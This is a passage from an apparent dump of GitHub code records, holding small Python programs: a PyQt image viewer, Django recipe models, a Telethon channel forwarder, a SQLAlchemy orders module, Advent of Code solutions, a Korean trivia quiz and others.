print(type(last_modified))\n","repo_name":"Tondejphajin/file-service-download","sub_path":"utils/s3_utils.py","file_name":"s3_utils.py","file_ext":"py","file_size_in_byte":5145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"5565304348","text":"import os\nimport sys\nfrom PyQt5.QtWidgets import QApplication, QDialog, QVBoxLayout, QHBoxLayout, QPushButton, QLabel, QFileDialog, QListWidget, QListWidgetItem, QWidget\nfrom PyQt5.QtGui import QPixmap, QCursor\nfrom PyQt5.QtCore import Qt\nfrom PyQt5 import QtCore\n\n\nclass ImageViewer(QDialog):\n def __init__(self):\n super().__init__()\n self.initUI()\n\n def initUI(self):\n self.setStyleSheet(\"background-color:#161219;\")\n self.setWindowTitle('Image Viewer')\n self.setGeometry(100, 100, 800, 600)\n\n main_layout = QHBoxLayout()\n\n # Left side with file list and \"Open Image Folder\" button\n left_widget = QWidget()\n left_layout = QVBoxLayout()\n left_widget.setLayout(left_layout)\n left_widget.setCursor(QCursor(QtCore.Qt.PointingHandCursor))\n\n self.file_list_widget = QListWidget(self)\n self.file_list_widget.itemClicked.connect(self.display_image)\n # Set text color and background color for the file list widget items\n self.file_list_widget.setStyleSheet(\n \"QListWidget { background-color: purple; }\"\n \"QListWidget:item { color: white; }\"\n )\n left_layout.addWidget(self.file_list_widget)\n\n open_button = QPushButton('Open Image Folder', self)\n open_button.setCursor(QCursor(QtCore.Qt.PointingHandCursor))\n open_button.clicked.connect(self.open_image_folder)\n open_button.setStyleSheet(\n \"*{border: 2px solid '#BC006C';\" +\n \" border-radius: 10px;\" +\n \" font-size: 20px;\" +\n \" color: white;\" +\n \" padding: 10px 0;\" +\n \" margin:10px 10px ;}\" +\n \"*:hover{background: '#BC006C';}\"\n )\n open_button.setFixedSize(290, 80)\n left_layout.addWidget(open_button)\n\n # Right side with displayed image\n right_widget = QWidget()\n right_layout = QVBoxLayout()\n right_widget.setLayout(right_layout)\n\n # Add the \"logo6.png\" initially visible\n self.logo_label = QLabel()\n logo_pixmap = QPixmap(\"logo6.png\")\n self.logo_label.setPixmap(logo_pixmap)\n self.logo_label.setAlignment(Qt.AlignCenter)\n right_layout.addWidget(self.logo_label)\n\n self.image_label = QLabel(self)\n right_layout.addWidget(self.image_label)\n\n 
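        # The stretch factors 3 and 7 below split the window roughly 30/70 between the file list and the image pane.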
main_layout.addWidget(left_widget, 3) # Adjust proportions as needed\n main_layout.addWidget(right_widget, 7) # Adjust proportions as needed\n\n self.setLayout(main_layout)\n\n self.current_folder = \"\"\n\n def open_image_folder(self):\n self.logo_label.hide() # Hide the logo when the folder is opened\n options = QFileDialog.Options()\n folder_path = QFileDialog.getExistingDirectory(\n self, 'Open Image Folder', options=options)\n if folder_path:\n self.current_folder = folder_path\n self.update_file_list(folder_path)\n\n def update_file_list(self, folder_path):\n self.file_list_widget.clear()\n for filename in os.listdir(folder_path):\n if filename.lower().endswith((\".png\", \".gif\", \".jpg\", \".jpeg\", \".bmp\")):\n item = QListWidgetItem(filename)\n self.file_list_widget.addItem(item)\n\n def display_image(self, item):\n if self.current_folder:\n image_path = os.path.join(self.current_folder, item.text())\n pixmap = QPixmap(image_path)\n self.image_label.setPixmap(pixmap)\n self.image_label.adjustSize()\n\n\ndef main():\n app = QApplication(sys.argv)\n viewer = ImageViewer()\n viewer.exec_() # Use exec_() to show the QDialog as a modal dialog\n sys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Lightmaker777/IMAGE-Multi-Tool","sub_path":"img_viewer.py","file_name":"img_viewer.py","file_ext":"py","file_size_in_byte":3749,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"13828462492","text":"import glob\nimport io\nimport sys\n\nfrom setuptools import setup\n\n# add mosaic_topog to our path in order to use the branch_scheme function\nsys.path.append(\"mosaic_topog\")\n#from branch_scheme import branch_scheme # noqa\n\nwith io.open(\"README.md\", \"r\", encoding=\"utf-8\") as readme_file:\n readme = readme_file.read()\n\nsetup_args = {\n \"name\": \"mosaic_topog\",\n \"author\": \"Sierra Schleufer, Sabesan Lab\",\n \"url\": \"https://github.com/schleuf/Incubator-2022-Geometry-of-Color/mosaic_topog/\",\n \"license\": \"MIT\",\n \"description\": \"tools for analyzing the geometry of cones in the photoreceptor mosaic\",\n \"long_description\": readme,\n \"long_description_content_type\": \"text/markdown\",\n \"package_dir\": {\"mosaic_topog\": \"mosaic_topog\"},\n \"packages\": [\"mosaic_topog\", \"mosaic_topog.tests\"],\n \"scripts\": glob.glob(\"scripts/*\"),\n #\"use_scm_version\": {\"local_scheme\": branch_scheme},\n \"include_package_data\": True,\n \"install_requires\": [\n \"numpy\",\n \"matplotlib\",\n \"scipy\",\n ],\n\n \"keywords\": \"cone photoreceptors\",\n}\n\nif __name__ == \"__main__\":\n setup(**setup_args)","repo_name":"schleuf/Incubator-2022-Geometry-of-Color","sub_path":"mosaic_topog/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9439668161","text":"from datetime import datetime\nimport logging\nimport os\n\ntstart = datetime.now()\ndir = 'logs/'\nif not os.path.exists(dir):\n os.mkdir(dir)\nlog_file = 'logs/builder_' + tstart.__str__() + '.log'\nlogging.basicConfig(filename=log_file, filemode='w', format='%(levelname)s:%(message)s', level=logging.INFO)\nlog = logging.getLogger(__name__)\n\n# build train module\n\n# launch train module\n\n# build and save predict module\n\n\n\nlog.info(\"All things built\")\ntend = datetime.now()\nlog.info('Total execute time ' + (tend - 
tstart).__str__())\n\n\n","repo_name":"truemanD/jn-production","sub_path":"builder.py","file_name":"builder.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7129622741","text":"import socket\nimport subprocess\nimport threading\nimport time\nimport sys\nimport os\n\nclass Vio:\n max_response_size = 1024\n vio_server_script = os.path.dirname(__file__) + \"/vio_server.tcl\"\n\n def __init__(self,\n tclsh=[\"tclsh\"],\n port=33000):\n self.tclsh = tclsh\n self.port = port\n\n def start(self):\n # Start server\n def vio_server_start():\n subprocess.run([*self.tclsh, Vio.vio_server_script, str(self.port)],\n stdout=sys.stdout, stderr=sys.stderr)\n \n self.vio_server_thread = threading.Thread(target=vio_server_start)\n self.vio_server_thread.start()\n print(\"Started VIO server.\")\n time.sleep(0.5)\n \n # Connect to server\n while True:\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n self.socket.connect((\"127.0.0.1\", self.port))\n break\n except ConnectionRefusedError:\n print(\"Connection refused. Trying again.\")\n self.socket.close()\n time.sleep(1)\n print(\"Socket connected.\")\n\n\n def _execute_vio_command(self, command):\n self.socket.send(bytes(command + \"\\n\", 'utf-8'))\n response = self.socket.recv(Vio.max_response_size).decode(\"utf-8\")\n \n status = response[0]\n response = response[1:]\n \n length = len(response) # response ends with \\r\\n\n response = response[0:length-2]\n \n if status == \"1\":\n return response\n elif status == \"0\":\n print(\"Command failed.\")\n return None\n else:\n print(\"Response has invalid status byte\")\n return None\n\n def read(self, name):\n return self._execute_vio_command(\"read \" + name)\n\n def write(self, name, value):\n res = self._execute_vio_command(\"write \" + name + \" \" + str(value))\n if res != None:\n return True\n else:\n return False\n \n def _print_response(response):\n print(\"Response: \\\"\" + response + \"\\\"\")\n\n def test(self):\n res = self._execute_vio_command(\"test\")\n if res == None or res != \"Test successfull.\":\n print(\"Test command unsuccessfull.\")\n return False\n \n res = self._execute_vio_command(\"asdf\")\n if res != None:\n print(\"Unsupported command did not reported.\")\n return False\n \n return True\n\n def stop(self):\n # Stop server\n res = self._execute_vio_command(\"exit\")\n \n # Disconnect client\n self.socket.close()\n print(\"Socket closed.\")\n\n \ndef main():\n vio = Vio()\n vio.start()\n if vio.test():\n print(\"Server test successfull.\")\n else:\n print(\"Server test FAILED.\")\n print(vio.read(\"led0\"))\n vio.write(\"sw0\", 1)\n vio.stop()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"canaknesil/vio-interface","sub_path":"vio.py","file_name":"vio.py","file_ext":"py","file_size_in_byte":3018,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"25590127032","text":"# Import the required libraries\nfrom tkinter import *\nfrom pystray import MenuItem as item\nimport pystray\nfrom PIL import Image, ImageTk\n\n# Create an instance of tkinter frame or window\nwin=Tk()\nwin.title(\"Reflow importer\")\nwin.iconbitmap(\"etc/favicon.ico\")\n\n# Set the size of the window\nwin.geometry(\"400x350\")\n\n\n# Add a Scrollbar(horizontal)\nv=Scrollbar(win, orient='vertical')\nv.pack(side=RIGHT, fill='y')\n\n# Add a text widget\ntext=Text(win, font=(\"Arial, 8\"), yscrollcommand=v.set)\n\n# Add 
some text in the text widget\n##for i in range(10):\n## text.insert(END, \"Welcome to Tutorialspoint...\\n\")\n## text.pack()\n\n# Attach the scrollbar with the text widget\nv.config(command=text.yview)\n#text.pack()\n\n# Define a function for quit the window\ndef quit_window(icon, item):\n icon.stop()\n win.destroy()\n\n# Define a function to show the window again\ndef show_window(icon, item):\n icon.stop()\n win.after(0,win.deiconify())\n\ndef info_window(icon, item):\n import webbrowser\n webbrowser.open_new(\"github.com/mcarlo95/reflow/\")\n\n# Hide the window and show on the system taskbar\ndef hide_window():\n win.withdraw()\n image=Image.open(\"etc/favicon.ico\")\n menu=(item('Quit', quit_window), item('Info', info_window), item('Show', show_window))\n icon=pystray.Icon(\"name\", image, \"Reflow importer running\", menu)\n icon.run_detached()\n\nwin.protocol('WM_DELETE_WINDOW', hide_window)\n\nwin.update_idletasks()\nwin.update()\n##\n#win.mainloop()\n","repo_name":"mcarlo95/reflow","sub_path":"dist/r011_reflow_interface.py","file_name":"r011_reflow_interface.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"322144496","text":"import sys\n\ndef getDataFile(path):\n fd = open(path, 'r')\n return fd.read()\n\ndef getOutcomRound(choice):\n if choice[0] == 'A':\n if choice[1] == 'X':\n return 3\n elif choice[1] == 'Y':\n return 6\n else:\n return 0\n elif choice[0] == 'B':\n if choice[1] == 'Y':\n return 3\n elif choice[1] == 'Z':\n return 6\n else:\n return 0\n else:\n if choice[1] == 'Z':\n return 3\n elif choice[1] == 'X':\n return 6\n else:\n return 0\n\ndef getMatchStrategies(choice):\n if choice[0] == 'A':\n if choice[1] == 'X':\n return 'Z'\n elif choice[1] == 'Y':\n return 'X'\n else:\n return 'Y'\n\n elif choice[0] == 'B':\n if choice[1] == 'X':\n return 'X'\n elif choice[1] == 'Y':\n return 'Y'\n else:\n return 'Z'\n else:\n if choice[1] == 'X':\n return 'Y'\n elif choice[1] == 'Y':\n return 'Z'\n else:\n return 'X'\n\ndef getShapeScore(shape):\n return 1 if shape == 'X' else 2 if shape == 'Y' else 3\n\ndef getMatchScore(match, elfStrategy):\n choice = match.split(' ')\n if elfStrategy:\n choice[1] = getMatchStrategies(choice)\n return getOutcomRound(choice) + getShapeScore(choice[1])\n\ndef getAllScore(buffer, elfStrategy):\n bufferArray = buffer.split('\\n')\n scores = []\n for x in bufferArray:\n scores.append(getMatchScore(x, elfStrategy))\n return scores\n\ndef getMyScore(scores):\n myScore = 0\n for x in scores:\n myScore += x\n return myScore\n\n# AX Rock 1 | BY Paper 2 | CZ Scissors 3\n# Lose 0 | Draw 3 | Win 6 \n\ndef main():\n if len(sys.argv) != 2:\n sys.exit(1)\n try:\n buffer = getDataFile(sys.argv[1])\n scores = getAllScore(buffer, False)\n print(\"Your total score will be\", getMyScore(scores))\n \n scores = getAllScore(buffer, True)\n print(\"Your total score with strategy guide will be\", getMyScore(scores))\n except OSError:\n print(\"Impossible to read\", sys.argv[1])\n sys.exit(1)\n except Exception as e:\n print(\"Unknown error !\", e)\n sys.exit(1)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"BliTz037/AdventOfCode2022","sub_path":"day02/day02.py","file_name":"day02.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37619137130","text":"from database.database import conn\nfrom sqlalchemy import text\nimport json\nimport datetime\nfrom 
models.expectedDelivery.expectedDelivery import getNumberOfDays\n\ndef addToOrders(userId,productId,timestamp,address,state,city,pincode):\n result=conn.execute(text(\"insert into orders(user_id,product_id,order_time,address,state,city,pincode) values (:userId,:productId,:timestamp,:address,:state,:city,:pincode)\").bindparams(userId=userId,productId=productId,timestamp=timestamp,address=address,state=state,city=city,pincode=pincode))\n number_of_days=getNumberOfDays(str(pincode))\n new_date_obj = timestamp + datetime.timedelta(days=number_of_days)\n expected_delivery = new_date_obj.strftime('%Y-%m-%d')\n order_status_result=conn.execute(text(\"insert into order_status(order_id,status,expected_delivery) values (:order_id,:status,:date)\").bindparams(order_id=result.lastrowid,status=\"In-Process\",date=expected_delivery))\n product_ids=json.loads(productId)\n for id in product_ids:\n conn.execute(text('update products set quantity=quantity-1 where id=:id').bindparams(id=id))\n\ndef getOrders(userId):\n result=conn.execute(text(\"select * from orders where user_id=:id order by order_time desc\").bindparams(id=userId)).all() \n orders=[]\n for row in result:\n orders.append(dict(row._mapping))\n return orders \n \ndef getOrdersForAdmin():\n result=conn.execute(text(\"select * from orders where id in (select order_id from order_status where status!=:status) order by order_time desc\").bindparams(status=\"Delivered\")).all() \n orders=[]\n for row in result:\n orders.append(dict(row._mapping))\n return orders \n\ndef getOrderDetails(orders):\n final_list={}\n for order in orders:\n products=json.loads(order['product_id'])\n temp_list=[]\n for id in products:\n result=conn.execute(text(\"select * from products where id=:id\").bindparams(id=id)).fetchone()\n temp_dict=dict(result._mapping)\n temp_dict['order_id']=order['id']\n temp_list.append(temp_dict) \n final_list[order['order_time']]=temp_list\n return final_list \n\ndef getOrderId(orderTime,userId):\n result=conn.execute(text(\"select id from orders where user_id=:id and order_time=:orderTime\").bindparams(id=userId,orderTime=orderTime)).fetchone()\n return int(result[0])\n\ndef getOrderStatus(orders):\n status=[]\n for order in orders:\n result=conn.execute(text(\"select * from order_status where order_id=:id\").bindparams(id=order['id'])).all() \n for row in result:\n status.append(dict(row._mapping))\n return status\n\ndef getParticularOrder(order_id):\n result=conn.execute(text(\"select * from orders where id=:id\").bindparams(id=order_id)).fetchone()\n return dict(result._mapping)\n\ndef getParticularOrderStatus(order_id):\n result=conn.execute(text(\"select * from order_status where order_id=:id\").bindparams(id=order_id)).fetchone()\n return dict(result._mapping)\n\ndef getOrderDetailsForParticularOrder(order):\n ids=json.loads(order['product_id'])\n products=[]\n for id in ids:\n result=conn.execute(text(\"select * from products where id=:id\").bindparams(id=id)).fetchone()\n products.append(dict(result._mapping)) \n return products\n\ndef updateOrderStatus(order_id,status):\n if(status==\"Delivered\"):\n current_date = datetime.date.today().strftime('%Y-%m-%d')\n conn.execute(text('update order_status set status=:status, delivered_on=:date where order_id=:id').bindparams(status=status,id=order_id,date=current_date))\n else:\n conn.execute(text('update order_status set status=:status where 
order_id=:id').bindparams(status=status,id=order_id))","repo_name":"mohit-cse/ProcurementTrackingSystem","sub_path":"database/orders.py","file_name":"orders.py","file_ext":"py","file_size_in_byte":3823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24642821860","text":"from aoc import *\nimport re\nfrom collections import defaultdict\n\n\ndef part_1(data):\n letters = {letter for line in data for letter in line}\n requirements = defaultdict(set)\n for (a, b) in data:\n requirements[b].add(a)\n is_available = lambda letter: not (letters & requirements[letter])\n result = []\n while letters:\n next_letter = min(filter(is_available, letters))\n result.append(next_letter)\n letters.remove(next_letter)\n return cat(result)\n\n\ndef part_2(data, workers = 1):\n letters = {letter for line in data for letter in line}\n end_times = {l: 999999 for l in letters}\n requirements = defaultdict(set)\n for (a, b) in data:\n requirements[b].add(a)\n time = 0\n while letters:\n workers += count(end_times[l] == time for l in end_times)\n is_available = lambda letter: all(end_times[l] <= time for l in requirements[letter])\n available_letters = sorted(filter(is_available, letters))\n for l in available_letters[:workers]:\n letters.remove(l)\n end_times[l] = time + ord(l) - 4\n workers -= 1\n time += 1\n return max(end_times.values())\n\n\ndata = mapl(lambda line: re.findall(\" ([A-Z]) \", line), read_input(7))\nprint(part_1(data))\nprint(part_2(data, 5))\n","repo_name":"narimiran/AdventOfCode2018","sub_path":"python/day07.py","file_name":"day07.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"40"} +{"seq_id":"35844611383","text":"#! 
/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport asyncio\nimport os\nimport logging\nfrom configparser import ConfigParser, MissingSectionHeaderError\n\n\n\ntry:\n    import socks\nexcept (ImportError, ModuleNotFoundError):\n    import sys\n    import subprocess\n\n    BASE_DIR = os.path.dirname(os.path.abspath(__file__))\n    input_file = os.path.join(BASE_DIR, 'requirements.txt')\n    PIPE = subprocess.PIPE\n    p = subprocess.Popen(sys.executable + f' -m pip3 install -r {input_file}', shell=True)\n    p.wait()\n    import socks\nfrom telethon import TelegramClient, events\nfrom telethon.tl.types import PeerChannel\n\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n                    filename='start_log.txt', level=logging.ERROR)\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\ncfg = os.path.join(BASE_DIR, 'config.ini')\n\nparser = ConfigParser()\ntry:\n    parser.read(cfg, encoding='UTF-8')\nexcept MissingSectionHeaderError:\n    print('Someone edited the config file with fucking Windows Notepad!')\n    temp = None\n    with open(cfg, 'rb') as config:\n        temp = config.read().decode(\"utf-8-sig\").encode(\"utf-8\")\n    with open(cfg, 'wb') as config:\n        config.write(temp)\n    parser.read(cfg, encoding='UTF-8')\n\n# bot values\napi_id = parser.get('App_values', 'api_id')\napi_hash = parser.get('App_values', 'api_hash')\n\n# target words\ntarget_words = []\nfor word in parser['Target_Words'].values():\n    target_words.append(word)\n\n# init my channels\nmain_channel = parser.get('Project_Channels', 'MainChannel')\nreserved_channel = parser.get('Project_Channels', 'ReservedChannel')\n\nclient = TelegramClient('work_session', api_id, api_hash, device_model='Tesla Model S',\n                        # connection=connection.ConnectionTcpMTProxyIntermediate,\n                        # if you have an MTProto proxy - remove the hashes above and below this note and edit the entry below,\n                        # the main thing is not to lose the parentheses.\n                        # proxy=('host', 443, 'secret'))\n                        proxy=(socks.SOCKS5, '127.0.0.1', 1088))\n\n\nasync def listen_channels(event: events.NewMessage):\n    \"\"\"\n    If any of the target words is in the text and one of the 3 trigger words is also in the message - forward it to the main channel;\n    if none of the 3 trigger words is present - send it to the reserved channel.\n    Mark the message as read.\n    :param event:\n    :return:\n    \"\"\"\n    if any(word in event.message.message.lower() for word in target_words):\n        if any(trigger in event.message.message.lower() for trigger in ['ищу', 'вакансия', 'требуется']):  # Russian trigger words: 'looking for', 'vacancy', 'required' (left untranslated: they are matched against message text)\n            await client.forward_messages(main_channel, event.message.id, event.message.to_id)\n        else:\n            await client.forward_messages(reserved_channel, event.message.id, event.message.to_id)\n    await event.message.mark_read()\n\n\nasync def prepare_donors(client_: TelegramClient):\n    \"\"\"\n    Convert all donor groups to IDs so that nothing breaks if a link changes.\n    :return:\n    \"\"\"\n    donors = []\n    for number, query in parser['Donor_Channels'].items():\n        if query.isdigit():\n            donor: PeerChannel = PeerChannel(int(query))\n        else:\n            try:\n                donor: PeerChannel = await client_.get_entity(query)\n            except Exception as err:\n                print(err)\n                continue\n            else:\n                parser.set('Donor_Channels', number, str(donor.id))\n        donors.append(donor)\n    with open(cfg, 'w', encoding='UTF-8') as conf:\n        parser.write(conf)\n    print('All links converted successfully.')\n    client_.add_event_handler(listen_channels, events.NewMessage(chats=(*donors,)))\n\n\nif __name__ == '__main__':\n    client.start()\n    client.loop.create_task(prepare_donors(client))\n    
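    # prepare_donors() registers the NewMessage handler for the donor chats; the call below then blocks, forwarding matching posts until the client disconnects.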
client.run_until_disconnected()\n","repo_name":"Neggod/TelethonParser","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4205,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
+{"seq_id":"33407221301","text":"from django.db import models\nfrom django.core.validators import (\n    RegexValidator,\n    MinValueValidator,\n    MaxValueValidator,\n)\n\nfrom django.conf import settings\n\nfrom users.models import User\n\n\nclass Tag(models.Model):\n    name = models.CharField(\n        'Recipe tag',\n        max_length=32,\n        null=False,\n        unique=True,\n    )\n    slug = models.SlugField(\n        'Recipe tag slug',\n        max_length=16,\n        null=False,\n        unique=True,\n    )\n    color = models.CharField(\n        'Tag color',\n        max_length=16,\n        null=False,\n        unique=True,\n        validators=[\n            RegexValidator(\n                regex=r'^#[0-9a-fA-F]{3,6}$',\n                message='Color format error (#AABBCC or #ABC)',\n            )\n        ],\n    )\n\n    class Meta:\n        ordering = ('name',)\n\n    def __str__(self):\n        return self.name\n\n\nclass Recipe(models.Model):\n    name = models.CharField(\n        'Recipe name',\n        max_length=200,\n        db_index=True,\n    )\n    text = models.TextField(\n        'Recipe description',\n    )\n    author = models.ForeignKey(\n        User,\n        verbose_name='Recipe author',\n        on_delete=models.CASCADE,\n        related_name='recipes',\n    )\n    image = models.ImageField(\n        'Recipe photo',\n        upload_to='recipes_photos/',\n    )\n    tags = models.ManyToManyField(\n        Tag,\n        related_name='recipes',\n    )\n    cooking_time = models.PositiveSmallIntegerField(\n        'cooking time',\n        validators=[\n            MinValueValidator(limit_value=1),\n            MaxValueValidator(limit_value=60*24),\n        ]\n    )\n    # The logic here is this:\n    # Users is a separate, self-contained app\n    # that knows how to handle users and subscriptions.\n    # If it were tied at the model level to this\n    # highly specialized app, it would stop\n    # being self-sufficient.\n    # If this logic is so-so, I'll fix it without question )\n    favorite = models.ManyToManyField(\n        User,\n        related_name='favorite_recipes',\n        blank=True,\n    )\n    pub_date = models.DateTimeField(\n        auto_now_add=True,\n        verbose_name='Publish date',\n    )\n\n    class Meta:\n        ordering = ('-pub_date',)\n\n    def __str__(self):\n        return self.name\n\n    def favorite_count(self):\n        return self.favorite.count()\n\n\nclass Ingredient(models.Model):\n    name = models.CharField(\n        'Ingredient name',\n        max_length=settings.STANDARD_MAX_CHAR_FIELD_LENGTH,\n        db_index=True,\n    )\n    measurement_unit = models.CharField(\n        'Measurement unit',\n        max_length=16,\n        null=False,\n    )\n\n    class Meta:\n        ordering = ('name',)\n\n    def __str__(self):\n        return f'{self.name} ({self.measurement_unit})'\n\n\nclass RecipeIngredients(models.Model):\n    ingredient = models.ForeignKey(\n        Ingredient,\n        verbose_name='Ingredient with measurement unit',\n        on_delete=models.CASCADE,\n        null=False,\n        related_name='+',\n    )\n    recipe = models.ForeignKey(\n        Recipe,\n        verbose_name='Recipe',\n        on_delete=models.CASCADE,\n        null=False,\n        related_name='ingredients',\n    )\n    amount = models.PositiveSmallIntegerField(\n        'amount of ingredient',\n        validators=[\n            MinValueValidator(limit_value=1),\n            MaxValueValidator(limit_value=10000),\n        ]\n    )\n\n    class Meta:\n        ordering = ('ingredient__name',)\n\n\nclass Cart(models.Model):\n    user = models.OneToOneField(\n        User,\n        verbose_name='Cart owner',\n        on_delete=models.CASCADE,\n        related_name='cart',\n    )\n    recipes = models.ManyToManyField(\n        Recipe,\n        verbose_name='Recipes in cart',\n        related_name='+',\n    )\n\n    class Meta:\n        ordering = ('recipes__name',)\n\n    def recipes_in_cart_count(self):\n        
return self.recipes.count()\n","repo_name":"sldmxm/foodgram-project-react","sub_path":"backend/recipes/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42306050566","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('article', '0001_initial'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='article',\n name='article_scheme_area',\n ),\n migrations.RemoveField(\n model_name='article',\n name='article_scheme_house',\n ),\n migrations.AlterField(\n model_name='article',\n name='article_foto',\n field=models.CharField(default='', verbose_name='Фотографія обєкту', max_length=400),\n ),\n ]\n","repo_name":"bezpoleznuj/zagran3","sub_path":"article/migrations/0002_auto_20150415_1919.py","file_name":"0002_auto_20150415_1919.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39504003989","text":"import pickle\nimport random\nquiz1 = [\"우리나라 최초의 한글 소설로 전해지는 이 고전소설의 이름은?\"]\nquiz2 = [\"오스트레일리아(호주)의 수도는?\"]\nquiz3 = [\"우리나라 국보 1호였던 문하재의 이름은?\"]\nquiz4 = [\"우리나라 수도는?\"]\nanswer1 = [\"피리부는사나이\",\"홍길동전\",\"어린왕자\",\"피터팬\"]\nanswer2 = [\"오세니아\",\"캔버라\",\"파리\",\"뉴욕\"]\nanswer3 = [\"경복궁\",\"승례문\",\"동대문\",\"불국사\"]\nanswer4 = [\"부산\",\"서울\",\"대구\",\"인천\"]\nwith open(\"pickles3.dat\", \"wb\") as pickle_file:\n pickle.dump(quiz1, pickle_file)\n pickle.dump(quiz2, pickle_file)\n pickle.dump(quiz3, pickle_file)\n pickle.dump(quiz4, pickle_file)\nwith open(\"pickles4.dat\", \"wb\") as pickle_file:\n pickle.dump(answer1, pickle_file)\n pickle.dump(answer2, pickle_file)\n pickle.dump(answer3, pickle_file)\n pickle.dump(answer4, pickle_file)\nwith open(\"pickles3.dat\", \"rb\") as pickle_file:\n loadquiz1 = pickle.load(pickle_file)\n loadquiz2 = pickle.load(pickle_file)\n loadquiz3 = pickle.load(pickle_file)\n loadquiz4 = pickle.load(pickle_file)\nwith open(\"pickles4.dat\", \"rb\") as pickle_file:\n loadanswer1 = pickle.load(pickle_file)\n loadanswer2 = pickle.load(pickle_file)\n loadanswer3 = pickle.load(pickle_file)\n loadanswer4 = pickle.load(pickle_file)\n\n\n\nprint(\" Welcome to Trivia Challenge!\\n\")\nprint(\" An Episode You Can't Refuse\\n\")\n\nquestions = [loadquiz1, loadquiz2, loadquiz3, loadquiz4]\nanswers = [loadanswer1, loadanswer2, loadanswer3, loadanswer4]\n\nwhile True:\n randomquestion = random.randint(0, len(questions) - 1)\n c_question = questions[randomquestion]\n c_answer = answers[randomquestion]\n \n print(f\"\\n{c_question[0]}\\n\") \n for i, option in enumerate(c_answer, start = 1):\n print(f\" {i} - {option}\")\n\n\n user = input(\"What's your answer?:\")\n try:\n user = int(user)\n if 1 <= user <= len(c_answer):\n if c_answer[user -1] == c_answer[1]:\n print(\"Correct\\n\")\n \n else:\n print(\"Wrong\\n\")\n else:\n print(\"try to input\\n\")\n except ValueError:\n print(\"Invalid input\\n\")\n\n","repo_name":"jungsungyun/pythonpro","sub_path":"chap8/prob6.py","file_name":"prob6.py","file_ext":"py","file_size_in_byte":2230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33406330753","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function\nimport aerospike\nimport pprint\nimport sys\nfrom random import randint\nimport 
datetime\n\ntry:\n\tconfig = {\n\t 'hosts': [\n\t\t( '127.0.0.1', 3000 )\n\t ],\n\t 'policies': {\n\t\t'timeout': 1000 # milliseconds\n\t }\n\t}\n\n\tclient = aerospike.client(config).connect()\n\nexcept Exception as e:\n print(\"error: {0}\".format(e), file=sys.stderr)\n sys.exit(1)\n\n\ntry:\n\n\tpp = pprint.PrettyPrinter(indent=2)\n\tclient = aerospike.client(config).connect()\n\t\t\t\n\tfor i in range(0,1000):\n\t\tkeyid = randint(0,10000) \t\n\t\t#tms = unicode(datetime.datetime.now())\n\t\tkey = ('test', 'table', keyid)\n\t\t#bins = {'timestamp': tms} \n\t\t(keyidr, meta, bins) = client.get(key)\n\n\tpp.pprint(i)\n\tpp.pprint(keyid)\n\tpp.pprint(meta)\n\tpp.pprint(bins)\n\nexcept Exception as e:\n\tprint(\"error: {0}\".format(e), file=sys.stderr)\n\tclient.close()\n\tsys.exit(2)\n\n\n\n","repo_name":"juv1nsk1/howto","sub_path":"playground/aero-bench-get.py","file_name":"aero-bench-get.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"40"} +{"seq_id":"5972400795","text":"import requests\nimport re\nfrom bs4 import BeautifulSoup\n\n\ndef get_page_reading_time(url: int) -> int:\n page = requests.get(\"https://klopets.com/readtime/?url={}\".format(url))\n soup = BeautifulSoup(page.content, \"html.parser\")\n result_by_id = soup.find(\"p\")\n if result_by_id != None:\n time_read = re.findall('[0-9]+' ,result_by_id.text)\n time_read_minutes = int(time_read[0])\n return time_read_minutes\n else:\n return 0\n\nif __name__==\"__main__\":\n print(get_page_reading_time(\"https://medium.com/@Relay_Chain/the-relay-bridge-how-does-it-works-d46ee1c795b3\"))\n","repo_name":"Miyamura80/Useful-Commands","sub_path":"Useful-API/youtube_search.py","file_name":"youtube_search.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"71250044922","text":"#wap to input length in feet and inches and print its equivalent length in metres\n# 1ft = 12 inch , 1 inch = 2.54 cm, 100cm = 1m\n\n\nvar_in_ft = int(input(\"enter the length in ft.: \"))\nvar_in_inch = 